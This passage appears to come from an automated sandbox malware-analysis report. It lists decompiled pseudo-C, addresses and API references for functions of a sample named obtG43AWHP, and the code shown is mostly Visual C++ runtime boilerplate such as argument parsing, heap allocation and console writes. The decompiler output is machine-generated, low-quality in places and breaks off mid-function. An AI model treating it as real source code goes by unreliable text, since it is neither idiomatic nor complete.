										_push(_t83);
										_t69 = 0;
										_push(_t75);
										_t77 = _v24;
										 *_t47 = 0;
										_t85 = _t55;
										 *_t77 = 1;
										if(_v28 != 0) {
											_a4 =  &(_a4[1]);
											 *_a4 = _t85;
										}
										do {
											if( *_t44 != 0x22) {
												 *_t47 =  *_t47 + 1;
												if(_t85 != 0) {
													 *_t85 =  *_t44;
													_t85 =  &(_t85[0]);
												}
												_t56 =  *_t44 & 0x0000ffff;
												_t44 =  &(_t44[1]);
												if(_t56 == 0) {
													_t44 = _t44 - 2;
												} else {
													goto L28;
												}
											} else {
												_t77 = _a8;
												_t44 =  &(_t44[1]);
												_t69 = 0 | _t69 == 0x00000000;
												_t56 = 0x22;
												goto L28;
											}
											L33:
											_v8 = _v8 & 0x00000000;
											L34:
											while( *_t44 != 0) {
												while(1) {
													_t57 =  *_t44 & 0x0000ffff;
													if(_t57 != 0x20 && _t57 != 9) {
														break;
													}
													_t44 =  &(_t44[1]);
												}
												if( *_t44 != 0) {
													if(_a4 != 0) {
														_a4 =  &(_a4[1]);
														 *_a4 = _t85;
													}
													 *_t77 =  *_t77 + 1;
													while(1) {
														_t80 = 1;
														_t71 = 0;
														L45:
														while( *_t44 == 0x5c) {
															_t44 =  &(_t44[1]);
															_t71 = _t71 + 1;
														}
														if( *_t44 == 0x22) {
															if((_t71 & 0x00000001) == 0) {
																if(_v8 == 0 || _t44[1] != 0x22) {
																	_t80 = 0;
																	_v8 = 0 | _v8 == 0x00000000;
																} else {
																	_t44 =  &(_t44[1]);
																}
															}
															_t71 = _t71 >> 1;
														}
														while(_t71 != 0) {
															_t71 = _t71 - 1;
															if(_t85 != 0) {
																_t60 = 0x5c;
																 *_t85 = _t60;
																_t85 =  &(_t85[0]);
															}
															 *_t47 =  *_t47 + 1;
														}
														_t58 =  *_t44 & 0x0000ffff;
														if(_t58 != 0 && (_v8 != _t71 || _t58 != 0x20 && _t58 != 9)) {
															if(_t80 != 0) {
																if(_t85 != 0) {
																	 *_t85 = _t58;
																	_t85 =  &(_t85[0]);
																}
																 *_t47 =  *_t47 + 1;
															}
															_t44 =  &(_t44[1]);
															_t80 = 1;
															_t71 = 0;
															goto L45;
														}
														if(_t85 != 0) {
															 *_t85 = 0;
															_t85 =  &(_t85[0]);
														}
														 *_t47 =  *_t47 + 1;
														_t77 = _a8;
														goto L34;
													}
												}
												break;
											}
											_t45 = _a4;
											if(_t45 != 0) {
												 *_t45 = 0;
											}
											 *_t77 =  *_t77 + 1;
											return _t45;
											goto L72;
											L28:
										} while (_t69 != 0 || _t56 != 0x20 && _t56 != 9);
										if(_t85 != 0) {
											 *((short*)(_t85 - 2)) = 0;
										}
										goto L33;
									} else {
										_t47 = _t47 + 4;
										goto L13;
									}
								}
							}
							goto L72;
						}
						E03006891( *0x300bdc4);
						 *0x300bdc4 =  *0x300bdc4 & 0x00000000;
						 *_t47 =  *_t47 & 0x00000000;
						 *0x3013080 = 1;
						_t39 = 0;
						goto L16;
					} else {
						_t39 = _t36 | 0xffffffff;
						L17:
						goto L18;
					}
				} else {
					_t39 = __eax | 0xffffffff;
					L18:
					return _t39;
				}
				L72:
			}































    0x030045c7
    0x030045ca
    0x030045d1
    0x030045d5
    0x030045f1
    0x030045f1
    0x030045f7
    0x030045e3
    0x030045e5
    0x030045e5
    0x00000000
    0x00000000
    0x00000000
    0x030045ed
    0x030045ed
    0x030045f9
    0x030045fe
    0x03004603
    0x03004607
    0x0300460f
    0x03004616
    0x03004653
    0x03004629
    0x03004629
    0x0300462c
    0x03004650
    0x03004650
    0x00000000
    0x0300462e
    0x03004631
    0x03004637
    0x03004638
    0x0300463c
    0x03004685
    0x0300468a
    0x03004691
    0x0300467a
    0x00000000
    0x0300463e
    0x03004641
    0x03004646
    0x0300464b
    0x03004698
    0x03004699
    0x0300469a
    0x0300469b
    0x0300469c
    0x0300469d
    0x030046a2
    0x030046a8
    0x030046a9
    0x030046aa
    0x030046ac
    0x030046ad
    0x030046b0
    0x030046b2
    0x030046b4
    0x030046bd
    0x030046c2
    0x030046c6
    0x030046c6
    0x030046c8
    0x030046cc
    0x030046e2
    0x030046e6
    0x030046eb
    0x030046ee
    0x030046ee
    0x030046f1
    0x030046f4
    0x030046fa
    0x03004737
    0x00000000
    0x00000000
    0x00000000
    0x030046ce
    0x030046ce
    0x030046da
    0x030046dd
    0x030046df
    0x00000000
    0x030046df
    0x03004716
    0x03004716
    0x00000000
    0x0300471a
    0x03004725
    0x03004725
    0x0300472b
    0x00000000
    0x00000000
    0x03004732
    0x03004732
    0x0300473f
    0x03004748
    0x0300474d
    0x03004751
    0x03004751
    0x03004753
    0x03004755
    0x03004757
    0x03004758
    0x00000000
    0x03004760
    0x0300475c
    0x0300475f
    0x0300475f
    0x0300476a
    0x0300476f
    0x03004775
    0x03004785
    0x0300478d
    0x0300477e
    0x0300477e
    0x0300477e
    0x03004775
    0x03004790
    0x03004790
    0x030047a4
    0x03004794
    0x03004797
    0x0300479b
    0x0300479c
    0x0300479f
    0x0300479f
    0x030047a2
    0x030047a2
    0x030047a8
    0x030047ae
    0x030047c1
    0x030047c5
    0x030047c7
    0x030047ca
    0x030047ca
    0x030047cd
    0x030047cd
    0x030047cf
    0x03004757
    0x03004758
    0x00000000
    0x0300475a
    0x030047d6
    0x030047da
    0x030047dd
    0x030047dd
    0x030047e0
    0x030047e2
    0x00000000
    0x030047e2
    0x03004755
    0x00000000
    0x0300473f
    0x030047ea
    0x030047ef
    0x030047f1
    0x030047f1
    0x030047f3
    0x030047f8
    0x00000000
    0x030046fc
    0x030046fc
    0x0300470e
    0x03004712
    0x03004712
    0x00000000
    0x0300464d
    0x0300464d
    0x00000000
    0x0300464d
    0x0300464b
    0x0300463c
    0x00000000
    0x0300462c
    0x0300465f
    0x03004664
    0x0300466b
    0x0300466e
    0x03004678
    0x00000000
    0x03004611
    0x03004611
    0x0300467b
    0x00000000
    0x0300467b
    0x030045d7
    0x030045d7
    0x0300467c
    0x0300467e
    0x0300467e
    0x00000000

    APIs
    • _wcslen.LIBCMT ref: 030045E7
      • Part of subcall function 03006933: Sleep.KERNEL32(00000000,03002BF3), ref: 0300695B
    • _wcslen.LIBCMT ref: 0300461F
      • Part of subcall function 03006891: HeapFree.KERNEL32(00000000,00000000), ref: 030068A7
      • Part of subcall function 03006891: GetLastError.KERNEL32(00000000,?,03004D31,00000000,?,03003EAA,03002BF3), ref: 030068B9
      • Part of subcall function 03003E01: GetCurrentProcess.KERNEL32(C0000417,03002BF3), ref: 03003E17
      • Part of subcall function 03003E01: TerminateProcess.KERNEL32(00000000), ref: 03003E1E
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Function 03003FEA, Relevance: 1.6, APIs: 1, Instructions: 54
    C-Code - Quality: 23%
    			E03003FEA(void* __edi, void* __esi, intOrPtr _a4) {
				void* _t4;
				intOrPtr* _t10;
				void* _t18;
				intOrPtr* _t19;
				void* _t21;

				_t21 = __esi;
				_t18 = __edi;
				_t24 =  *0x3013090;
				if( *0x3013090 != 0 && E030072F0(_t24, 0x3013090) != 0) {
					_t2 =  *0x3013090(_a4);
				}
				E030068CB(_t2);
				_t4 = E03003FC6(0x3001148, 0x3001160); // executed
				_t26 = _t4;
				if(_t4 == 0) {
					_push(_t21);
					_push(_t18);
					E0300723E(_t26, E03004B6A); // executed
					_t19 = 0x3001140;
					if(0x3001140 >= 0x3001144) {
						L8:
						_t30 =  *0x3013094;
						if( *0x3013094 != 0 && E030072F0(_t30, 0x3013094) != 0) {
							 *0x3013094(0, 2, 0);
						}
						return 0;
					} else {
						goto L5;
					}
					do {
						L5:
						_t10 =  *_t19;
						if(_t10 != 0) {
							 *_t10();
						}
						_t19 = _t19 + 4;
					} while (_t19 < 0x3001144);
					goto L8;
				}
				return _t4;
			}








    0x03003fea
    0x03003fea
    0x03003fef
    0x03003ff6
    0x0300400a
    0x03004010
    0x03004011
    0x03004020
    0x03004027
    0x03004029
    0x0300402b
    0x0300402c
    0x03004032
    0x03004042
    0x03004046
    0x03004057
    0x03004057
    0x03004060
    0x03004077
    0x03004077
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x03004048
    0x03004048
    0x03004048
    0x0300404c
    0x0300404e
    0x0300404e
    0x03004050
    0x03004053
    0x00000000
    0x03004048
    0x03004080

    APIs
      • Part of subcall function 030068CB: EncodePointer.KERNEL32(6D9A0167,?,?,03004016), ref: 030068D7
    • __initterm_e.LIBCMT ref: 03004020
      • Part of subcall function 030072F0: __FindPESection.LIBCMT ref: 0300734B
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Function 03008A59, Relevance: 1.6, APIs: 1, Instructions: 52
    C-Code - Quality: 86%
    			E03008A59(signed int _a4, signed int _a8, intOrPtr* _a12) {
				void* _t10;
				intOrPtr* _t12;
				signed int _t13;
				signed int _t17;
				intOrPtr* _t19;
				long _t24;

				_t17 = _a4;
				if(_t17 == 0) {
					L3:
					_t24 = _t17 * _a8;
					if(_t24 == 0) {
						_t24 = _t24 + 1;
					}
					goto L5;
					L6:
					_t10 = RtlAllocateHeap( *0x300c64c, 8, _t24); // executed
					if(0 == 0) {
						goto L7;
					}
					L14:
					return _t10;
					goto L15;
					L7:
					if( *0x300cb3c == 0) {
						_t19 = _a12;
						if(_t19 != 0) {
							 *_t19 = 0xc;
						}
					} else {
						if(E030070F3(_t10, _t24) != 0) {
							L5:
							_t10 = 0;
							if(_t24 > 0xffffffe0) {
								goto L7;
							} else {
								goto L6;
							}
						} else {
							_t12 = _a12;
							if(_t12 != 0) {
								 *_t12 = 0xc;
							}
							_t10 = 0;
						}
					}
					goto L14;
				} else {
					_t13 = 0xffffffe0;
					if(_t13 / _t17 >= _a8) {
						goto L3;
					} else {
						 *((intOrPtr*)(E03003EA5())) = 0xc;
						return 0;
					}
				}
				L15:
			}









    0x03008a5e
    0x03008a63
    0x03008a80
    0x03008a85
    0x03008a89
    0x03008a8b
    0x03008a8b
    0x00000000
    0x03008a93
    0x03008a9c
    0x03008aa4
    0x00000000
    0x00000000
    0x03008ad8
    0x03008ada
    0x00000000
    0x03008aa6
    0x03008aad
    0x03008acb
    0x03008ad0
    0x03008ad2
    0x03008ad2
    0x03008aaf
    0x03008ab8
    0x03008a8c
    0x03008a8c
    0x03008a91
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x03008aba
    0x03008aba
    0x03008abf
    0x03008ac1
    0x03008ac1
    0x03008ac7
    0x03008ac7
    0x03008ab8
    0x00000000
    0x03008a65
    0x03008a69
    0x03008a6f
    0x00000000
    0x03008a71
    0x03008a76
    0x03008a7f
    0x03008a7f
    0x03008a6f
    0x00000000

    APIs
    • RtlAllocateHeap.NTDLL(00000008,03002BF3,00000000,?,03006949,?,03002BF3,00000000,00000000,00000000,?,03004CF2,00000001,00000214,?,03003EAA), ref: 03008A9C
      • Part of subcall function 030070F3: DecodePointer.KERNEL32(?,03008AB5,03002BF3,00000000,?,03006949,?,03002BF3,00000000,00000000,00000000,?,03004CF2,00000001,00000214), ref: 030070FE
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Function 030071D1, Relevance: 1.5, APIs: 1, Instructions: 22
    C-Code - Quality: 37%
    			E030071D1() {
				signed int* _t1;
				void* _t3;
				signed int* _t6;

				_t1 = E03006933(0x20, 4);
				_t6 = _t1;
				__imp__EncodePointer(_t6); // executed
				 *0x3013088 = _t1;
				 *0x3013084 = _t1;
				if(_t6 != 0) {
					 *_t6 =  *_t6 & 0x00000000;
					return 0;
				} else {
					_t3 = 0x18;
					return _t3;
				}
			}






    0x030071d8
    0x030071df
    0x030071e2
    0x030071e8
    0x030071ed
    0x030071f4
    0x030071fb
    0x03007201
    0x030071f6
    0x030071f8
    0x030071fa
    0x030071fa

    APIs
      • Part of subcall function 03006933: Sleep.KERNEL32(00000000,03002BF3), ref: 0300695B
    • EncodePointer.KERNEL32(00000000), ref: 030071E2
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Function 030068CB, Relevance: 1.5, APIs: 1, Instructions: 13
    APIs
    • EncodePointer.KERNEL32(6D9A0167,?,?,03004016), ref: 030068D7
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Function 03005004, Relevance: 1.5, APIs: 1, Instructions: 10
    C-Code - Quality: 100%
    			E03005004() {
				void* _t3;

				_t3 = HeapCreate(0, 0x1000, 0); // executed
				 *0x300c64c = _t3;
				return 0 | _t3 != 0x00000000;
			}




    0x0300500d
    0x0300501a
    0x03005021

    APIs
    • HeapCreate.KERNELBASE(00000000,00001000,00000000,03002D8D), ref: 0300500D
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Function 03003F69, Relevance: 1.5, APIs: 1, Instructions: 8
    C-Code - Quality: 100%
    			E03003F69(int _a4) {

				E03003F3E(_a4);
				ExitProcess(_a4);
			}



    0x03003f71
    0x03003f7a

    APIs
      • Part of subcall function 03003F3E: GetModuleHandleW.KERNEL32(mscoree.dll,?,03003F76,?,?,030089F4,000000FF,0000001E,00000001,00000000,00000000,?,030068FF,?,00000001,?), ref: 03003F48
      • Part of subcall function 03003F3E: GetProcAddress.KERNEL32(00000000,CorExitProcess,?,03003F76,?,?,030089F4,000000FF,0000001E,00000001,00000000,00000000,?,030068FF,?,00000001), ref: 03003F58
    • ExitProcess.KERNEL32 ref: 03003F7A
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Function 03006D03, Relevance: 1.5, APIs: 1, Instructions: 4
    APIs
    • EncodePointer.KERNEL32(Function_00006CCA,03003FC1,00000000,00000000,00000000,00000000,00000000,00000000,771CF9A3,03004F54,?,03002D9E), ref: 03006D08
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Function 03004B90, Relevance: 1.5, APIs: 1, Instructions: 3
    APIs
    • EncodePointer.KERNEL32(00000000,030073D2,0300BE08,00000314,00000000,?,?,?,?,?,0300438C,0300BE08,Microsoft Visual C++ Runtime Library,00012010), ref: 03004B92
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Function 03006933, Relevance: 1.3, APIs: 1, Instructions: 30
    C-Code - Quality: 100%
    			E03006933(signed int _a4, signed int _a8) {
				void* _t4;
				long _t6;
				void* _t7;
				long _t8;
				void* _t9;
				void* _t12;
				void* _t13;

				_t8 = 0;
				while(1) {
					_t4 = E03008A59(_a4, _a8, 0); // executed
					_t7 = _t4;
					_t9 = _t9 + 0xc;
					if(_t7 != 0) {
						break;
					}
					_t12 =  *0x300c670 - _t4; // 0x0
					if(_t12 > 0) {
						Sleep(_t8);
						_t3 = _t8 + 0x3e8; // 0x3e8
						_t6 = _t3;
						_t13 = _t6 -  *0x300c670; // 0x0
						if(_t13 > 0) {
							_t6 = _t6 | 0xffffffff;
						}
						_t8 = _t6;
						if(_t6 != 0xffffffff) {
							continue;
						}
					}
					break;
				}
				return _t7;
			}










    0x0300693a
    0x0300693c
    0x03006944
    0x03006949
    0x0300694b
    0x03006950
    0x00000000
    0x00000000
    0x03006952
    0x03006958
    0x0300695b
    0x03006961
    0x03006961
    0x03006967
    0x0300696d
    0x0300696f
    0x0300696f
    0x03006972
    0x03006977
    0x00000000
    0x00000000
    0x03006977
    0x00000000
    0x03006958
    0x0300697e

    APIs
      • Part of subcall function 03008A59: RtlAllocateHeap.NTDLL(00000008,03002BF3,00000000,?,03006949,?,03002BF3,00000000,00000000,00000000,?,03004CF2,00000001,00000214,?,03003EAA), ref: 03008A9C
    • Sleep.KERNEL32(00000000,03002BF3), ref: 0300695B
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd

    Non-executed Functions

    Function 0300521F, Relevance: 7.6, APIs: 5, Instructions: 54
    C-Code - Quality: 100%
    			E0300521F() {
				struct _FILETIME _v12;
				signed int _v16;
				union _LARGE_INTEGER _v20;
				signed int _t14;
				signed int _t16;
				signed int _t17;
				signed int _t18;
				signed int _t22;
				signed int _t25;
				signed int _t34;

				_t14 =  *0x300bbe4; // 0x1979767b
				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
				if(_t14 == 0xbb40e64e || (0xffff0000 & _t14) == 0) {
					GetSystemTimeAsFileTime( &_v12);
					_t16 = GetCurrentProcessId();
					_t17 = GetCurrentThreadId();
					_t18 = GetTickCount();
					QueryPerformanceCounter( &_v20);
					_t22 = _v16 ^ _v20.LowPart;
					_t34 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
					if(_t34 != 0xbb40e64e) {
						if((0xffff0000 & _t34) == 0) {
							_t22 = (_t34 | 0x00004711) << 0x10;
							_t34 = _t34 | _t22;
						}
					} else {
						_t34 = 0xbb40e64f;
					}
					 *0x300bbe4 = _t34;
					 *0x300bbe8 =  !_t34;
					return _t22;
				} else {
					_t25 =  !_t14;
					 *0x300bbe8 = _t25;
					return _t25;
				}
			}













    0x03005227
    0x0300522c
    0x03005230
    0x03005242
    0x03005256
    0x03005262
    0x0300526a
    0x03005272
    0x0300527e
    0x03005287
    0x0300528a
    0x0300528e
    0x03005299
    0x030052a2
    0x030052a5
    0x030052a5
    0x03005290
    0x03005290
    0x03005290
    0x030052a7
    0x030052af
    0x00000000
    0x03005248
    0x03005248
    0x0300524a
    0x00000000
    0x0300524a

    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 03005256
    • GetCurrentProcessId.KERNEL32 ref: 03005262
    • GetCurrentThreadId.KERNEL32 ref: 0300526A
    • GetTickCount.KERNEL32 ref: 03005272
    • QueryPerformanceCounter.KERNEL32(?), ref: 0300527E
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Function 0027DFB2, Relevance: .1, Instructions: 61
    Memory Dump Source
    • Source File: 00000001.00000002.1453650771.0027D000.00000040.sdmp, Offset: 0027D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_27d000_obtG43AWHP.jbxd
    Function 03005429, Relevance: 23.0, APIs: 15, Instructions: 494
    C-Code - Quality: 90%
    			E03005429(void* __ebx, signed int __edx, long _a4, long _a8, signed int _a12) {
				signed int _v8;
				char _v15;
				void _v16;
				short _v1724;
				char _v5140;
				void _v6844;
				short _v6848;
				long _v6852;
				signed char _v6853;
				long _v6860;
				long _v6864;
				int _v6868;
				long _v6872;
				long _v6876;
				long _v6880;
				long _v6884;
				signed int _v6888;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t209;
				long _t211;
				intOrPtr _t214;
				long _t215;
				intOrPtr _t216;
				long _t217;
				void* _t223;
				signed int _t225;
				signed int* _t230;
				long _t242;
				long _t245;
				signed int* _t246;
				long _t252;
				long _t253;
				signed int* _t256;
				long _t262;
				long _t263;
				void* _t267;
				long _t271;
				int _t272;
				long _t274;
				void* _t275;
				short _t277;
				void* _t278;
				void* _t282;
				long _t284;
				void* _t286;
				int _t293;
				int _t300;
				void* _t304;
				intOrPtr* _t313;
				long _t314;
				signed int _t315;
				signed short* _t316;
				signed int _t317;
				long _t318;
				signed short* _t319;
				signed char _t322;
				long _t331;
				long _t335;
				long _t337;
				char _t341;
				signed int _t352;
				long _t355;
				void* _t356;
				void* _t357;
				long _t359;
				signed int _t361;
				void* _t362;

				_t350 = __edx;
				_t312 = __ebx;
				E03007F10(0x1ae4);
				_t209 =  *0x300bbe4; // 0x1979767b
				_v8 = _t209 ^ _t361;
				_t211 = _a8;
				_t355 = _a4;
				_t352 = 0;
				_v6864 = _t211;
				_v6860 = 0;
				_v6868 = 0;
				if(_a12 != 0) {
					__eflags = _t211;
					if(_t211 != 0) {
						_push(__ebx);
						_t313 = 0x3012f80 + (_t355 >> 5) * 4;
						_t214 =  *_t313;
						_t352 = (_t355 & 0x0000001f) << 6;
						_t322 =  *((intOrPtr*)(_t214 + _t352 + 0x24)) +  *((intOrPtr*)(_t214 + _t352 + 0x24)) >> 1;
						_v6880 = _t313;
						_v6853 = _t322;
						__eflags = _t322 - 2;
						if(_t322 == 2) {
							L6:
							_t322 =  !_a12;
							__eflags = _t322 & 0x00000001;
							if((_t322 & 0x00000001) != 0) {
								L8:
								__eflags =  *(_t214 + _t352 + 4) & 0x00000020;
								if(( *(_t214 + _t352 + 4) & 0x00000020) != 0) {
									E030052BA(_t322, _t355, 0, 0, 2);
									_t362 = _t362 + 0x10;
								}
								_t215 = E03005C43(_t355);
								__eflags = _t215;
								if(_t215 == 0) {
									L45:
									_t325 = 0;
									__eflags = 0;
									goto L46;
								} else {
									__eflags =  *(_t352 +  *_t313 + 4) & 0x00000080;
									if(__eflags == 0) {
										goto L45;
									}
									_t267 = E03004D40(_t313, _t350, __eflags);
									__eflags =  *( *((intOrPtr*)(_t267 + 0x6c)) + 0x14);
									_t355 = 0 |  *( *((intOrPtr*)(_t267 + 0x6c)) + 0x14) == 0x00000000;
									_t271 = GetConsoleMode( *(_t352 +  *_t313),  &_v6884);
									_t325 = 0;
									__eflags = _t271;
									if(_t271 == 0) {
										L46:
										_t216 =  *_t313;
										__eflags =  *(_t216 + _t352 + 4) & 0x00000080;
										if(( *(_t216 + _t352 + 4) & 0x00000080) == 0) {
											_t217 = WriteFile( *(_t216 + _t352), _v6864, _a12,  &_v6876, _t325);
											__eflags = _t217;
											if(_t217 == 0) {
												L85:
												_v6848 = GetLastError();
												L86:
												__eflags = _v6860;
												if(_v6860 != 0) {
													_t220 = _v6860 - _v6868;
													__eflags = _v6860 - _v6868;
													L97:
													_pop(_t312);
													L98:
													return E03006BA0(_t220, _t312, _v8 ^ _t361, _t350, _t352, _t355);
												}
												L87:
												__eflags = _v6848;
												if(_v6848 == 0) {
													L91:
													_t223 =  *_v6880;
													__eflags =  *(_t352 + _t223 + 4) & 0x00000040;
													if(( *(_t352 + _t223 + 4) & 0x00000040) == 0) {
														L94:
														 *((intOrPtr*)(E03003EA5())) = 0x1c;
														_t225 = E03003EB8();
														 *_t225 =  *_t225 & 0x00000000;
														__eflags =  *_t225;
														L95:
														_t220 = _t225 | 0xffffffff;
														goto L97;
													}
													__eflags =  *_v6864 - 0x1a;
													if( *_v6864 != 0x1a) {
														goto L94;
													}
													_t220 = 0;
													goto L97;
												}
												_t355 = 5;
												__eflags = _v6848 - _t355;
												if(_v6848 != _t355) {
													_t225 = E03003ECB(_v6848);
												} else {
													 *((intOrPtr*)(E03003EA5())) = 9;
													_t225 = E03003EB8();
													 *_t225 = _t355;
												}
												goto L95;
											}
											_v6848 = _v6848 & 0x00000000;
											_v6860 = _v6876;
											goto L86;
										}
										__eflags = _v6853;
										_v6848 = _t325;
										if(_v6853 != 0) {
											__eflags = _v6853 - 2;
											if(_v6853 != 2) {
												_v6872 = _v6864;
												__eflags = _a12 - _t325;
												if(_a12 <= _t325) {
													goto L91;
												} else {
													goto L70;
												}
												do {
													L70:
													_v6852 = _v6852 & 0x00000000;
													_t331 = _v6872 - _v6864;
													__eflags = _t331;
													_t230 =  &_v1724;
													_t356 = 2;
													do {
														__eflags = _t331 - _a12;
														if(_t331 >= _a12) {
															break;
														}
														_t350 =  *_v6872 & 0x0000ffff;
														_v6872 = _v6872 + _t356;
														_t331 = _t331 + _t356;
														__eflags = _t350 - 0xa;
														if(_t350 == 0xa) {
															_t315 = 0xd;
															 *_t230 = _t315;
															_t230 = _t230 + _t356;
															_t167 =  &_v6852;
															 *_t167 = _v6852 + _t356;
															__eflags =  *_t167;
														}
														_v6852 = _v6852 + _t356;
														 *_t230 = _t350;
														_t230 = _t230 + _t356;
														__eflags = _v6852 - 0x6a8;
													} while (_v6852 < 0x6a8);
													_t355 = 0;
													asm("cdq");
													_t314 = WideCharToMultiByte(0xfde9, 0,  &_v1724, _t230 -  &_v1724 - _t350 >> 1,  &_v5140, 0xd55, 0, 0);
													__eflags = _t314;
													if(_t314 == 0) {
														goto L85;
													} else {
														goto L76;
													}
													while(1) {
														L76:
														_t242 = WriteFile( *(_t352 +  *_v6880), _t361 + _t355 - 0x1410, _t314 - _t355,  &_v6876, 0);
														__eflags = _t242;
														if(_t242 == 0) {
															break;
														}
														_t355 = _t355 + _v6876;
														__eflags = _t314 - _t355;
														if(_t314 > _t355) {
															continue;
														}
														L80:
														__eflags = _t314 - _t355;
														if(_t314 > _t355) {
															goto L86;
														}
														goto L81;
													}
													_v6848 = GetLastError();
													goto L80;
													L81:
													_t245 = _v6872 - _v6864;
													_v6860 = _t245;
													__eflags = _t245 - _a12;
												} while (_t245 < _a12);
												goto L86;
											}
											_t316 = _v6864;
											__eflags = _a12 - _t325;
											if(_a12 <= _t325) {
												goto L91;
											} else {
												goto L60;
											}
											do {
												L60:
												_v6852 = _v6852 & 0x00000000;
												_t335 = _t316 - _v6864;
												__eflags = _t335;
												_t246 =  &_v6844;
												_t357 = 2;
												do {
													__eflags = _t335 - _a12;
													if(_t335 >= _a12) {
														break;
													}
													_t350 =  *_t316 & 0x0000ffff;
													_t316 = _t316 + _t357;
													_t335 = _t335 + _t357;
													_v6884 = _t316;
													__eflags = _t350 - 0xa;
													if(_t350 == 0xa) {
														_v6868 = _v6868 + _t357;
														_t317 = 0xd;
														 *_t246 = _t317;
														_t316 = _v6884;
														_t246 = _t246 + _t357;
														_t140 =  &_v6852;
														 *_t140 = _v6852 + _t357;
														__eflags =  *_t140;
													}
													_v6852 = _v6852 + _t357;
													 *_t246 = _t350;
													_t246 = _t246 + _t357;
													__eflags = _v6852 - 0x13fe;
												} while (_v6852 < 0x13fe);
												_t355 = _t246 -  &_v6844;
												_t252 = WriteFile( *(_t352 +  *_v6880),  &_v6844, _t355,  &_v6876, 0);
												__eflags = _t252;
												if(_t252 == 0) {
													goto L85;
												}
												_t253 = _v6876;
												_v6860 = _v6860 + _t253;
												__eflags = _t253 - _t355;
												if(_t253 < _t355) {
